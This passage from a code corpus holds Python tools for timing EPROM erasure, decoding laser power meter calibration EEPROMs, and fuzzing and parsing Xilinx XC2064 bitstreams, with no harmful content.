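# Worked example (assuming erased_threshold=20): after 100 non-erased reads, the loop
# ends once 25 consecutive erased reads accumulate (25 / 125 total = 20% -> end_check = 100%)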
j = {
"type": "read",
'iter': iter,
'seconds': dt_this,
'read': fw2str(read_buf),
'read_meta': "zlib",
'complete_percent': complete_percent,
'erase_percent': erase_percent,
'erased': erased
}
fout.write(json.dumps(j) + '\n')
fout.flush()
signature = hash8(read_buf)
print(
"pass %u / %u, iter % 3u @ %s: is_erased %u w/ erase_percent % 8.3f%%, sig %s, end_check: %0.1f%%"
% (
passn,
need_passes,
iter,
util.time_str_sec(dt_this),
erased,
erase_percent,
signature,
#
end_check))
if dt_50 is None and erase_percent >= 50 or test:
dt_50 = tlast - tstart
print("50%% erased after %0.1f sec" % (dt_50, ))
if end_check >= 100.0 or test:
break
dt_120 = tlast - tstart
print("Erased 100%% after %0.1f sec" % (dt_100, ))
print("Erased 120%% after %0.1f sec" % (dt_120, ))
j = {
"type": "footer",
"erase_time": dt_100,
"run_time": dt_120,
"half_erase_time": dt_50
}
if prog_time is not None:
j["prog_time"] = prog_time
fout.write(json.dumps(j) + '\n')
fout.flush()
return dt_100, dt_50
def run(dout,
prog_dev,
erased_threshold=20.,
interval=3.0,
passes=1,
read_init=True,
write_init=False,
eraser=None,
bulb=None,
user=None,
sn=None,
test=False,
timeout=None,
verbose=False):
if passes > 1 and not write_init:
raise Exception("Must --write-init if > 1 pass")
if not os.path.exists(dout):
os.makedirs(dout, exist_ok=True)
print("")
prog = Minipro(device=prog_dev, verbose=verbose)
print("Checking programmer...")
size = len(prog.read()["code"])
print("Device is %u bytes" % size)
# Write 0's at the beginning of every pass
init_buf = bytearray(size)
for passn in range(passes):
# 1 based indexing. At least make it match iter
passn += 1
fnout = '%s/iter_%02u.jl' % (dout, passn)
print('')
print('Writing to %s' % fnout)
read_init_buf = None
if read_init:
print('Reading initial state')
read_init_buf = prog.read()["code"]
if write_init:
print('Writing initial buffer...')
tstart = time.time()
prog.write(init_buf, verify=False)
prog_time = time.time() - tstart
print('Wrote in %0.1f sec' % prog_time)
else:
prog_time = None
with open(fnout, "w") as fout:
j = {
"type": "header",
"prog": "minipro",
"prog_dev": prog.device,
"datetime": tnow(),
"interval": interval,
"erased_threshold": erased_threshold,
}
if test:
j['test'] = bool(test)
if user:
j['user'] = user
if sn:
j['sn'] = sn
if eraser:
j['eraser'] = eraser
if bulb:
j['bulb'] = bulb
if read_init_buf:
j['read'] = fw2str(read_init_buf)
fout.write(json.dumps(j) + '\n')
fout.flush()
wait_erased(fout,
prog=prog,
erased_threshold=erased_threshold,
interval=interval,
prog_time=prog_time,
passn=passn,
need_passes=passes,
timeout=timeout,
test=test,
verbose=verbose)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description="Collect data on EPROM erasure time")
parser.add_argument('--device',
required=True,
help='minipro device. See "minipro -l"')
parser.add_argument(
'--passes',
type=int,
default=1,
help='Number of program-erase cycles. Requires --write-init')
parser.add_argument('--dir', default=None, help='Output directory')
parser.add_argument('--erased-threshold',
type=float,
default=20.,
help='Erase complete threshold (percent)')
parser.add_argument('--interval',
type=float,
default=3.0,
help='Erase check interval (seconds)')
parser.add_argument('--timeout',
type=float,
default=60 * 60,
help='Per pass timeout in seconds')
parser.add_argument('--eraser',
type=str,
default=None,
help='Eraser metadata')
parser.add_argument('--bulb', type=str, default=None, help='Bulb metadata')
parser.add_argument('--user',
type=str,
default="mcmaster",
help='Contributor metadata')
parser.add_argument('--sn', type=str, default=None, help='S/N metadata')
parser.add_argument(
'--postfix',
default=None,
help='Use default output dir, but add description postfix')
util.add_bool_arg(parser,
"--read-init",
default=True,
help="Read device at beginning")
util.add_bool_arg(parser,
"--write-init",
default=False,
help="Zero device at beginning. Only use on slow erases")
util.add_bool_arg(parser,
"--test",
default=False,
help="Run full software quickly")
util.add_bool_arg(parser, "--verbose", default=False)
args = parser.parse_args()
log_dir = args.dir
if log_dir is None:
postfix = args.postfix
# keep a descriptive default name
if postfix is None:
postfix = "sn-%s_bulb-%s" % (args.sn, args.bulb)
log_dir = util.default_date_dir("log", "", postfix)
timeout = args.timeout
if timeout < 1.0:
timeout = None
run(log_dir,
args.device,
passes=args.passes,
erased_threshold=args.erased_threshold,
interval=args.interval,
read_init=args.read_init,
write_init=args.write_init,
eraser=args.eraser,
bulb=args.bulb,
user=args.user,
sn=args.sn,
timeout=timeout,
test=args.test,
verbose=args.verbose)
```
#### File: JohnDMcMaster/eetime/csv_runs.py
```python
import argparse
stats = None
import os
import glob
def find_jl_dirs(root_dir):
if os.path.isdir(root_dir) and glob.glob(root_dir + "/*.jl"):
yield root_dir
# yield "prod/prod/2022-03-23_04_pe140t-2/2022-03-23_01_ee17/"
for f in os.listdir(root_dir):
d = os.path.join(root_dir, f)
# A subdir with .jl files?
if os.path.isdir(d):
for d2 in find_jl_dirs(d):
yield d2
def write_header(f):
l = "dir"
l += ",sn"
l += ",vendor,device"
l += ",prog,prog_dev"
l += ",eraser,bulb"
l += ",N"
l += ",t50_raw,t100_raw"
l += ",t50_norm,t100_norm"
f.write(l + "\n")
f.flush()
def write_row(f, d, vendor, device, statj):
h = statj["header"]
l = "%s" % d
l += ",%s" % (h["sn"])
l += ",%s,%s" % (vendor, device)
l += ",%s,%s" % (h["prog"], h["prog_dev"])
l += ",%s,%s" % (h["eraser"], h["bulb"])
l += ",%s" % (statj["n"])
l += ",%0.1f,%0.1f" % (statj["t50"], statj["t100"])
l += ",%0.1f,%0.1f" % (statj["t50_adj"], statj["t100_adj"])
f.write(l + "\n")
f.flush()
def load_sns(fn):
"sn to (vendor, model)"
# FIXME
ret = {}
f = open(fn, "r")
_header = f.readline()
for l in f:
l = l.strip()
sn, vendor, model = l.split(",")
ret[sn] = (vendor, model)
return ret
def normalize_txx(statj):
"""
Compute normalized erasure sensitivities
Baseline is:
-New USHIO G4T5 bulb
-Bulb to chip: based on PE-140T EPROM eraser
Chip at factory tray height
TODO: calculate distance from bulb
Bulb 2 vs 3
./stats.py prod/log_05_ee2x_bulbs/bulb2/2022-03-23_05_ee20/
t50: 145.4 sec
t100: 222.9 sec
./stats.py ./prod/log_05_ee2x_bulbs/bulb3/2022-03-24_03_ee20_bulb-3
t50: 129.5 sec
t100: 198.5 sec
ratios
t50: 0.89
t100: 0.89
./stats.py prod/log_05_ee2x_bulbs/bulb2/2022-03-23_01_ee21
t50: 137.0 sec
t100: 192.5 sec
./stats.py prod/log_05_ee2x_bulbs/bulb3/2022-03-24_05_ee21_bulb-3
t50: 125.3 sec
t100: 175.8 sec
ratios
t50: 0.91
t100: 0.91
"""
# TODO: move this to a JSON or something
bulb_scalars = {
# bulb 1 broke
# was used for early testing, ignore going forward
# FIXME
"1": 1.0,
# See lec_2022-03-24.txt
"2": 0.90,
"3": 1.00,
"4": 1.00,
}
assert "pe140t" in statj["header"]["eraser"]
bulb = statj["header"]["bulb"]
assert bulb in bulb_scalars, "Failed to find bulb %s" % bulb
scalar = bulb_scalars[bulb]
statj["t50_adj"] = statj["t50"] * scalar
statj["t100_adj"] = statj["t100"] * scalar
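# Example of the normalization above, using the bulb-2 measurement quoted in the docstring:
#   t50 = 137.0 s -> t50_adj = 137.0 * 0.90 = 123.3 s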
def run(root_dir, csv_fn, sns_fn=None, strict=True):
global stats
sns = load_sns(sns_fn)
f = open(csv_fn, "w")
write_header(f)
# takes a long time to import
if stats is None:
import stats
processed = 0
tries = 0
for d in find_jl_dirs(root_dir):
tries += 1
try:
statj = stats.run(d=d)
if statj["n"] == 0:
print("WARNING: skipping bad dir %s" % d)
if strict:
raise Exception("skipping bad dir %s" % d)
continue
sn = statj["header"]["sn"]
if sn not in sns:
print("WARNING: failed to find sn: %s" % sn)
if strict:
raise Exception("failed to find sn: %s" % sn)
vendor = ""
device = ""
else:
vendor, device = sns[sn]
normalize_txx(statj)
write_row(f, d, vendor, device, statj)
processed += 1
except Exception as e:
if strict:
raise
print(e)
print("")
print("")
print("")
f.close()
print("Wrote %u / %u entries to %s" % (processed, tries, csv_fn))
def main():
parser = argparse.ArgumentParser(
description="Generate a .csv w/ high level stats")
parser.add_argument('--sns', default="db/sns.csv", help='S/N .csv in')
parser.add_argument('root_dir',
default="db/prod",
nargs="?",
help='Directory to look around in')
parser.add_argument('csv',
default="db/runs.csv",
nargs="?",
help='.csv out')
args = parser.parse_args()
run(root_dir=args.root_dir, csv_fn=args.csv, sns_fn=args.sns)
if __name__ == "__main__":
main()
```
#### File: eetime/eetime/jl.py
```python
import json
import glob
import os
def load_jl(fn):
header = None
footer = None
reads = []
for l in open(fn, "r"):
j = json.loads(l)
if j["type"] == "header":
header = j
if "sn" in header:
header["sn"] = header["sn"].upper()
elif j["type"] == "footer":
footer = j
elif j["type"] == "read":
reads.append(j)
elif j["type"] == "timeout":
break
else:
assert 0, j["type"]
return header, footer, reads
def load_jls_arg(args, ignore_bad=True):
# accept multiple dirs or individual files
fns = []
for fn in args:
if os.path.isdir(fn):
fns += sorted(list(glob.glob(fn + "/*.jl")))
else:
fns += [fn]
for fn in sorted(fns):
header, footer, reads = load_jl(fn)
if not footer:
continue
yield fn, header, footer, reads
``` |
{
"source": "JohnDMcMaster/molectron",
"score": 3
} |
#### File: JohnDMcMaster/molectron/cm_lm.py
```python
import argparse
import struct
from uvscada.util import hexdump
import datetime
from lpmcal.parser import *
def read_str(buff):
"""
First field is number chars
"""
n = buff[0]
del buff[0]
ret = ""
for _i in range(n):
ret += chr(buff[0])
del buff[0]
return ret
def run(fn_in):
print("")
print("Reading", fn_in)
buff = bytearray(open(fn_in, "rb").read())
# Fixed size structure
buff = buff[0:0xC8]
"""
eeprom/lm/lm-100-qd-hd_j465.bin
00000000 01 06 30 30 35 31 31 36 00 4c 4d 2d 35 30 30 30 |..005116.LM-5000|
00000000 01 16 30 30 42 42 32 38 00 4c 4d 2d 31 30 20 51 |..00BB28.LM-10 Q|
00000000 01 16 31 36 34 00 00 00 00 4c 4d 2d 34 35 20 51 |..164....LM-45 Q|
00000000 01 16 31 39 5a 37 38 00 00 4c 4d 2d 31 30 20 51 |..19Z78..LM-10 Q|
00000000 01 16 32 32 31 34 36 33 00 4c 4d 2d 33 30 56 20 |..221463.LM-30V |
00000000 01 16 47 35 35 35 00 00 00 4c 4d 2d 31 30 20 51 |..G555...LM-10 Q|
00000000 01 16 4a 34 35 36 00 00 00 4c 4d 2d 31 30 30 20 |..J456...LM-100 |
00000000 01 16 43 30 34 30 00 00 00 4c 4d 2d 31 30 20 51 |..C040...LM-10 Q|
00000000 02 08 30 31 41 5a 37 34 00 4c 4d 2d 32 20 49 52 |..01AZ74.LM-2 IR|
00000000 02 08 30 35 30 30 48 30 00 4c 4d 2d 32 20 49 52 |..0500H0.LM-2 IR|
00000000 02 08 30 30 58 47 36 30 00 4c 4d 2d 32 20 53 49 |..00XG60.LM-2 SI|
00000000 02 08 31 34 33 33 44 30 00 4c 4d 2d 32 20 55 56 |..1433D0.LM-2 UV|
hmm these are weird
00000000 01 41 4a 4b 37 38 00 00 00 4c 4d 2d 50 31 30 46 |.AJK78...LM-P10F|
00000000 01 41 5a 4c 30 32 00 00 00 4c 4d 2d 50 31 30 46 |.AZL02...LM-P10F|
"""
print("Prefix1: %u" % read_u8(buff))
print("Prefix2: %u" % read_u8(buff))
print("Serial number: %s" % read_str_buff(buff, 7))
print("Model number: %s" % read_str_buff(buff, 17))
print("Part number: %s" % read_str_buff(buff, 13))
for i in range(10):
read_debug_unk32le(buff, "loop1-0x%02X" % i)
print("Some u8: %u" % read_u8(buff))
for i in range(30):
read_debug_unk32le(buff, "loop2-0x%02X" % i)
assert len(buff) == 0
def main():
parser = argparse.ArgumentParser(description='Decode')
parser.add_argument('fn_in', help='File name in')
args = parser.parse_args()
run(fn_in=args.fn_in)
if __name__ == "__main__":
main()
```
#### File: JohnDMcMaster/molectron/gentec_ps.py
```python
import argparse
import struct
from lpmcal.util import hexdump
import datetime
from lpmcal.parser import *
from lpmcal.util import tostr
def run(fn_in, verbose=False):
print("")
print("Reading", fn_in)
"""
00000000 00 00 00 00 d0 e8 00 58 00 0c 00 00 e4 d8 e4 d4 |.......X........|
00000010 00 c0 00 00 00 00 00 00 00 00 fe 00 00 4a e0 48 |.............J.H|
00000020 00 f8 00 00 fe 00 00 00 00 00 0a f4 8e 5c 70 60 |.............\p`|
00000030 ee 38 8a 60 4c 40 cc b4 c0 c4 08 5c 00 00 00 00 |.8.`L@.....\....|
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000050 00 00 00 00 00 24 00 00 00 38 00 02 72 70 fe 4a |.....$...8..rp.J|
00000060 e6 04 fe 2a 74 28 fe 0a 34 6c fe 04 88 e0 fe 02 |...*t(..4l......|
00000070 d0 74 fc fe ea 04 fc fe 9c cc fc fa 80 50 fc fa |.t...........P..|
00000080 b2 80 fc f8 10 a0 00 00 00 00 00 00 00 00 00 00 |................|
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000a0 30 38 00 86 ae 14 00 1c 28 f4 00 00 00 18 00 00 |08......(.......|
000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000c0 00 00 00 00 00 00 04 ac 7c 86 e0 8c fc fa 32 fc |........|.....2.|
000000d0 fc f8 36 60 fc fc 20 30 fc fe 8c 64 fc fc 20 20 |..6`.. 0...d.. |
000000e0 fe 00 00 00 fe 00 2e 3c fe 00 e8 50 fe 04 00 02 |.......<...P....|
000000f0 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
"""
# floats: nope
if 0:
for ii in range(4):
buff = bytearray(open(fn_in, "rb").read())
# buff = buff[0x5C + ii:]
buff = buff[0xC6 + ii:]
hexdump(buff)
for i in range(10):
print("")
print(i)
# read_debug_u16be(buff)
# read_debug_u16be(buff)
peek_debug_fle(buff)
read_debug_fle(buff)
# As signed: -438 to -776
if 0:
buff = bytearray(open(fn_in, "rb").read())
buff = buff[0x5C + 2:]
hexdump(buff)
for i in range(10):
print("")
print(i)
read_debug_u16sbe(buff)
read_debug_u16sbe(buff)
if 1:
buff = bytearray(open(fn_in, "rb").read())
while True:
# read_debug_u16be(buff)
read_debug_u8(buff)
def main():
parser = argparse.ArgumentParser(description='Decode')
parser.add_argument('--verbose', action="store_true")
parser.add_argument('fn_in', help='File name in')
args = parser.parse_args()
run(fn_in=args.fn_in, verbose=args.verbose)
if __name__ == "__main__":
main()
```
#### File: molectron/lpmcal/parser.py
```python
import struct
def peek_u8(buff, off):
return buff[off]
def peek_u16le(buff, off):
return struct.unpack("<H", buff[off:off + 2])[0]
def peek_u32le(buff, off):
return struct.unpack("<I", buff[off:off + 4])[0]
def peek_fle(buff, off):
return struct.unpack("<f", buff[off:off + 4])[0]
def peek_u16be(buff, off):
return struct.unpack(">H", buff[off:off + 2])[0]
def peek_u32be(buff, off):
return struct.unpack(">I", buff[off:off + 4])[0]
def peek_fbe(buff, off):
return struct.unpack(">f", buff[off:off + 4])[0]
def read_buff(buff, n):
ret = buff[0:n]
del buff[0:n]
return ret
def read_u8(buff):
ret = buff[0]
del buff[0]
return ret
def read_u16le(buff):
ret = struct.unpack("<H", buff[0:2])[0]
del buff[0:2]
return ret
def read_u32le(buff):
ret = struct.unpack("<I", buff[0:4])[0]
del buff[0:4]
return ret
def read_fle(buff):
ret = struct.unpack("<f", buff[0:4])[0]
del buff[0:4]
return ret
def read_u16be(buff):
ret = struct.unpack(">H", buff[0:2])[0]
del buff[0:2]
return ret
def read_u16sbe(buff):
ret = struct.unpack(">h", buff[0:2])[0]
del buff[0:2]
return ret
def read_u32be(buff):
ret = struct.unpack(">I", buff[0:4])[0]
del buff[0:4]
return ret
def read_fbe(buff):
ret = struct.unpack(">f", buff[0:4])[0]
del buff[0:4]
return ret
def read_debug_unk32le(buff, label="unknown"):
f = peek_fle(buff, 0)
u32 = read_u32le(buff)
print(label + ":", u32, "/", "0x%08X" % u32, "/", f)
return u32
def read_debug_u8(buff, label="unknown"):
u8 = read_u8(buff)
print(label + ":", u8, "/", "0x%02X" % u8)
return u8
def read_debug_u16le(buff, label="unknown"):
u16 = read_u16le(buff)
print(label + ":", u16, "/", "0x%04X" % u16)
return u16
def read_debug_u32le(buff, label="unknown"):
u32 = read_u32le(buff)
print(label + ":", u32, "/", "0x%08X" % u32)
return u32
def read_debug_fle(buff, label="unknown"):
f = read_fle(buff)
print(label + ":", f)
return f
def read_debug_u16be(buff, label="unknown"):
u16 = read_u16be(buff)
print(label + ":", u16, "/", "0x%04X" % u16)
return u16
def read_debug_u16sbe(buff, label="unknown"):
u16 = read_u16sbe(buff)
print(label + ":", u16, "/", "0x%04X" % u16)
return u16
def read_debug_u32be(buff, label="unknown"):
u32 = read_u32be(buff)
print(label + ":", u32, "/", "0x%08X" % u32)
return u32
def read_debug_fbe(buff, label="unknown"):
f = read_fbe(buff)
print(label + ":", f)
return f
def peek_debug_fle(buff, label=""):
f = peek_fle(buff, 0)
print(label + ":", f)
return f
def peek_debug_unk32le(buff, label=""):
f = peek_fle(buff, 0)
u32 = peek_u32le(buff, 0)
print(label + ":", u32, "/", "0x%08X" % u32, "/", f)
def peek_debug_fbe(buff, label=""):
f = peek_fbe(buff, 0)
print(label + ":", f)
return f
def peek_debug_unk32be(buff, label=""):
f = peek_fbe(buff, 0)
u32 = peek_u32be(buff, 0)
print(label + ":", u32, "/", "0x%08X" % u32, "/", f)
def read_str_buff(buff, n):
ret = ""
for i in range(n):
chari = buff[i]
if not chari:
break
ret += chr(chari)
del buff[0:n]
return ret
def read_byte_buff(buff, n):
ret = buff[0:n]
del buff[0:n]
return ret
def read_struct(buff, format):
n = struct.calcsize(format)
ret = struct.unpack(format, buff[0:n])
del buff[0:n]
return ret
```
#### File: JohnDMcMaster/molectron/new_835.py
```python
import argparse
import struct
from lpmcal.util import hexdump
import datetime
from lpmcal.parser import *
from lpmcal.util import tostr
def led2str(buff):
"""
LED format: The eight bits in each byte indicate which segment of the
LED should be turned on (1) or off (0). The relation between the bit
position and the segment is as follows: (note that bit 2 controls the
decimal point to the bottom left of the digit)
--3--
| |
0 6
| |
--4--
| |
1 7
| |
2 --5--
For example, programming the serial number to D3h 3Bh 23h 5B would
display 'HELP' on startup.
"""
ret = ""
for n in buff:
# print(hex(n))
ret += {
0xC0: "1",
0x7A: "2",
0xF8: "3",
0xB9: "5",
0xBB: "6",
0xD9: "7",
0xEB: "8",
}[n]
return ret
def led2art(byte):
def bit(n):
if byte & (1 << n):
return {
0: "|",
1: "|",
2: ".",
3: "-",
4: "-",
5: "-",
6: "|",
7: "|",
}[n]
else:
return " "
return """\
%c%c%c%c%c
%c %c
%c %c
%c %c
%c%c%c%c%c
%c %c
%c %c
%c %c
%c %c%c%c%c%c""" % (
bit(3),
bit(3),
bit(3),
bit(3),
bit(3),
bit(0),
bit(6),
bit(0),
bit(6),
bit(0),
bit(6),
bit(5),
bit(5),
bit(5),
bit(5),
bit(5),
bit(1),
bit(7),
bit(1),
bit(7),
bit(1),
bit(7),
bit(2),
bit(5),
bit(5),
bit(5),
bit(5),
bit(5),
)
if 0:
print(led2art(0x7A))
import sys
sys.exit(1)
def decode_com(buff, verbose=False):
buff = buff[0:0x5D0]
verbose and hexdump(buff)
"""
"It carries 8K bytes of data, and shares its first 1K addresses with
an onboard static RAM HM6514
(that's why its first nonzero memory address is at $400)."
"""
for _i in range(0x400):
# assert read_u8(buff) == 0xFF
read_u8(buff)
print("Detector S/N:", led2str(read_buff(buff, 4)))
print("Attenuator S/N:", led2str(read_buff(buff, 4)))
read_debug_u16le(buff)
read_debug_u16le(buff)
read_debug_u16le(buff)
print("Start:", read_u8(buff) * 10, "nm")
print("End:", read_u8(buff) * 10, "nm")
def decode_a5(buff, verbose=False):
"""
http://redlum.xohp.pagesperso-orange.fr/electronics/Newport835.html#extra
Revision A5 EPROM format summary:
000h-3F0h: All FFh=255d
400h-403h: Detector serial number (in LED format)
404h-407h: Attenuator serial number (in LED format)
408h-40Ah: Unknown
40Bh-40Dh: Unknown
40Eh : Start wavelength (e.g. 28h=40d -> 400nm)
40Fh : End wavelength (e.g. 6Eh=110d -> 1100nm)
***A5/A6 diverges
410h-411h: Unknown
412h : Exponent bias for detector without attenuator
413h : Exponent bias for detector with attenuator
414h-565h: MSB of calibration coefficients (detector without
attenuator, followed by detector with attenuator, padded
with zeros)
566h-567h: Unknown
568h-6B9h: LSB of calibration coefficients (detector without
attenuator, followed by detector with attenuator, padded
with zeros). Start adress may vary.
"""
decode_com(buff, verbose=verbose)
read_debug_u16le(buff)
exp_wo_atten = read_u8(buff)
print("Exponent bias for detector without attenuator:", exp_wo_atten)
# "typically = 3 for SL and 2 for IR type det"
exp_w_atten = read_u8(buff)
print("Exponent bias for detector with attenuator:", exp_w_atten)
def decode_a6(buff, verbose=False):
"""
http://redlum.xohp.pagesperso-orange.fr/electronics/Newport835.html#extra
Revision A6 EPROM format summary:
000h-3F0h: All FFh=255d
400h-403h: Detector serial number (in LED format)
404h-407h: Attenuator serial number (in LED format)
408h-40Ah: Unknown
40Bh-40Dh: Unknown; these bytes repeat the 3 previous ones and it thus seems likely
that these two triples are associated with detector and attenuator, resp.
40Eh : Start wavelength (e.g. 28h=40d -> 400nm)
40Fh : End wavelength (e.g. 6Eh=110d -> 1100nm)
***A5/A6 diverges
410h-411h: Unknown
416h : Exponent bias for detector without attenuator (typically = 0)
417h : Exponent bias for detector with attenuator (typically = 3 for SL and 2 for IR type det)
418h-...h: MSB of calibration coefficients (detector without
attenuator, followed by detector with attenuator, padded
with zeros)
506h-...: LSB of calibration coefficients (detector without
attenuator, followed by detector with attenuator, padded
with zeros). Start adress may vary, for example it is
often equal to 540h.
"""
decode_com(buff, verbose=verbose)
read_debug_u16le(buff)
read_debug_u16le(buff)
# ***A5/A6 diverges
# "typically = 0"
# hmm these seem too large
# Exponent bias for detector without attenuator: 7
# Exponent bias for detector with attenuator: 32
exp_wo_atten = read_u8(buff)
print("Exponent bias for detector without attenuator:", exp_wo_atten)
# "typically = 3 for SL and 2 for IR type det"
exp_w_atten = read_u8(buff)
print("Exponent bias for detector with attenuator:", exp_w_atten)
"""
Calibration coefficient format: The calibration coefficients are 16
bit floating point numbers. The two most significant bits, when added
to the exponent bias (offset 412h and 413h), are the base 10 exponent.
The remaining least significant 14 bits are the fractional mantissa.
Interpreting the 14 LSB as a binary number B (0 to 16383), the
relationship between the detector responsivity (R) at a given
wavelength and the calibration coefficient is as follows:
R = (B/16384) / 10^(E+bias)
For example, assuming that exponent bias is 0, here are some sample
responsivity and corresponding 16 bit calibration coefficients:
500.0 mA/W = 2000h
250.0 mA/W = 1000h
125.0 mA/W = 0800h
12.50 mA/W = 4800h
1.25 mA/W = 8800h
125.0 uA/W = C800h
Note that exponents less than zero have not been tested. The maximum
responsivity for positive exponents is:
0.9999 A/W = 3FFFh
"""
verbose and hexdump(buff)
# read_debug_u32(buff)
caln = 0x8E
c1s = []
c2s = []
c3s = []
for i in range(caln):
c1s.append(read_u8(buff))
verbose and hexdump(buff)
for i in range(caln):
c2s.append(read_u8(buff))
for i in range(12):
assert read_u8(buff) == 0
for i in range(caln):
c3s.append(read_u8(buff))
print("Cal table")
for c1, c2, c3 in zip(c1s, c2s, c3s):
exp = c1 >> 6
assert c2 == 0
n14 = ((c1 & 0x3F) << 8) + c3
val = (n14 / 16384.) / (10**(exp + exp_wo_atten))
if verbose:
print(" cs", c1, c2, c3)
print(" %0.3f" % val)
read_debug_u16le(buff)
def run(fn_in, version=None, verbose=False):
print("")
print("Reading", fn_in)
buff = bytearray(open(fn_in, "rb").read())
# TODO: figure out a better sanity check here
assert len(buff) >= 0x5D0
if version is None:
"""
Unfortunately this string field is not in 835 dumps
00000200 01 38 31 38 2d 49 52 00 00 00 00 00 00 00 00 00 |.818-IR.........|
"""
if len(buff) == 2048:
raise Exception("Bare sensor cal? FIXME")
"""
00000000 52 45 56 20 41 31 20 20 20 53 4f 46 54 57 41 52 |REV A1 SOFTWAR|
00000010 45 20 42 59 20 54 45 44 20 48 55 42 45 52 9b 9c |E BY <NAME>..|
"""
if len(buff) == 4096:
raise Exception("GPIB ROM? Does not contain cal data")
assert len(
buff) == 8 * 1024, "Need full firmware for auto detect version"
# Firmware isn't part of the cal
# But all dumps so far include it
"""
000006b0 00 00 00 00 00 00 00 00 00 00 ff ff 4c 50 4d 20 |............LPM |
000006c0 52 45 56 20 41 35 20 20 20 eb c0 7a f8 d1 b9 bb |REV A5 ..z....|
"""
check_a5 = tostr(buff[0x6bc:0x6c6])
"""
00000660 ff ff ff ff ff ff ff ff 4c 50 4d 20 52 45 56 20 |........LPM REV |
00000670 41 36 20 20 20 eb c0 7a f8 d1 b9 bb c8 fb d9 00 |A6 ..z........|
"""
check_a6 = tostr(buff[0x668:0x672])
if check_a5 == "LPM REV A5":
version = "A5"
elif check_a6 == "LPM REV A6":
version = "A6"
else:
hexdump(check_a5)
hexdump(check_a6)
assert 0, "Failed to detect rev (wrong format?)"
print("Decoding version", version)
if version == "A5":
decode_a5(buff, verbose=verbose)
elif version == "A6":
decode_a6(buff, verbose=verbose)
else:
assert 0, ("Failed to detect rev (wrong format?)", version)
def main():
parser = argparse.ArgumentParser(description='Decode')
parser.add_argument('--verbose', action="store_true")
parser.add_argument('--version', default=None)
parser.add_argument('fn_in', help='File name in')
args = parser.parse_args()
run(fn_in=args.fn_in, version=args.version, verbose=args.verbose)
if __name__ == "__main__":
main()
``` |
{
"source": "JohnDMcMaster/p2064",
"score": 2
} |
#### File: fuzzer/clb_lut/theorem.py
```python
lut_r2off = {
'A': 0x3e,
'B': 0x36,
'C': 0x2e,
# +
'D': 0x25,
'E': 0x1d,
'F': 0x15,
# +
'G': 0x0c,
'H': 0x04,
}
# Potential vs observed
# LUT_NOFF = 0x08
LUT_NOFF = 0x02
lut_c2frame = {
'A': 0x8b,
'B': 0x79,
'C': 0x67,
# +
'D': 0x53,
'E': 0x41,
'F': 0x2f,
# +
'G': 0x1b,
'H': 0x09,
}
LUT_NFRAMES = 0x12
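# Addressing model used in run() below: the LUT bits of CLB (row, col) live in the window
#   frame  = lut_c2frame[col] + framei  for 0 <= framei < LUT_NFRAMES
#   offset = lut_r2off[row]  + offi     for 0 <= offi   < LUT_NOFF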
def load_bits(fin):
ret = set()
for l in fin:
# bit_04_0f
_prefix, wordi, offi = l.split('_')
ret.add((int(wordi, 16), int(offi, 16)))
return ret
def load_design(fin):
ret = {}
fin.readline()
for l in fin:
k, v = l.split(',')
v = int(v, 16)
ret[k] = v
return ret
def run(bitf, designf, fout):
bitdb = load_bits(bitf)
designdb = load_design(designf)
for rowi, row in enumerate('ABCDEFGH'):
for coli, col in enumerate('ABCDEFGH'):
'''
seg 00020500_000
bit 00_22
...
bit 35_52
bit 35_53
tag CLB.SLICE_X0.C5FF.ZINI 1
tag CLB.SLICE_X0.C5FF.ZRST 0
tag CLB.SLICE_X0.CLKINV 0
'''
fout.write('seg %02X%02X\n' % (rowi, coli))
base_frame = lut_c2frame[col]
base_off = lut_r2off[row]
for framei in xrange(LUT_NFRAMES):
frame = base_frame + framei
for offi in xrange(LUT_NOFF):
off = base_off + offi
if (frame, off) in bitdb:
fout.write('bit %02X_%02X\n' % (framei, offi))
val = designdb[row + col]
for maski in xrange(16):
expect = 1 ^ int(bool((val & (1 << maski))))
fout.write('tag CLB.LUT[%02X] %d\n' % (maski, expect))
def main():
import argparse
parser = argparse.ArgumentParser(
description=
'Find bit locations'
)
parser.add_argument('--verbose', type=int, help='')
parser.add_argument('bits', help='.bits input file')
parser.add_argument('design', help='design.txt input file')
parser.add_argument('segdata', help='segadata output file')
args = parser.parse_args()
run(open(args.bits, 'r'), open(args.design, 'r'), open(args.segdata, 'w'))
if __name__ == '__main__':
main()
```
#### File: p2064/xc2k/bit2bits.py
```python
from xc2k import parser
from xc2k import container
def bit2bits(fin, fout, format='bit'):
bit2bitsf(open(fin, 'r'), open(fout, 'w'))
def bit2bitsf(fin, fout, format='bit'):
p = parser.Parser(container.getbits(fin, format))
for framei, frame in enumerate(p.frames()):
for biti, bit in enumerate(frame['payload']):
# self.nframes = {'xc2018': 196, 'xc2064': 160}[dev]
# self.frame_bits = {'xc2018': 87, 'xc2064': 71}[dev]
if bit:
fout.write('bit_%02x_%02x\n' % (framei, biti))
```
#### File: p2064/xc2k/container.py
```python
import bitstring
def revbits8(n):
return int('{:08b}'.format(n)[::-1], 2)
def revbits4(n):
return int('{:04b}'.format(n)[::-1], 2)
def revnib(n):
return ((n & 0xF) << 4) | ((n >> 4) & 0xF)
def munge(n):
return (revbits4(n & 0xF) << 4) | revbits4((n >> 4) & 0xF)
def getbits_bin(f):
return bitstring.ConstBitStream(bytes=f.read())
def getbits_bit(f):
# bit w/ header
buff = f.read()
buff = buff[0x76:]
return bitstring.ConstBitStream(bytes=buff)
def getbits_rom(f):
# random rom file they gave me
buff = bytearray()
for b in f.read():
# Reverse bits, swap nibbles
buff += chr(munge(ord(b)))
return bitstring.ConstBitStream(bytes=buff)
def getbits(f, format='bit'):
bits = {
'bin': getbits_bin,
'bit': getbits_bit,
'rom': getbits_rom,
}[format](f)
return bits
``` |
{
"source": "JohnDMcMaster/pal866",
"score": 2
} |
#### File: JohnDMcMaster/pal866/jl2eprom.py
```python
import binascii
import json
import time
def run(fnin, fnout=None, verbose=False):
if fnout is None:
fnout = fnin.replace(".jl", ".bin")
assert fnout != fnin, "Couldn't auto-name output file"
fin = open(fnin, "r")
meta = json.loads(fin.readline())
# Possibly could give a --force option
assert meta["part"] == "PAL16L8", "Only non-registered parts supported"
assert len(meta["pins"]["D"]) == 8
buff = bytearray(meta["data_words"])
for l in fin:
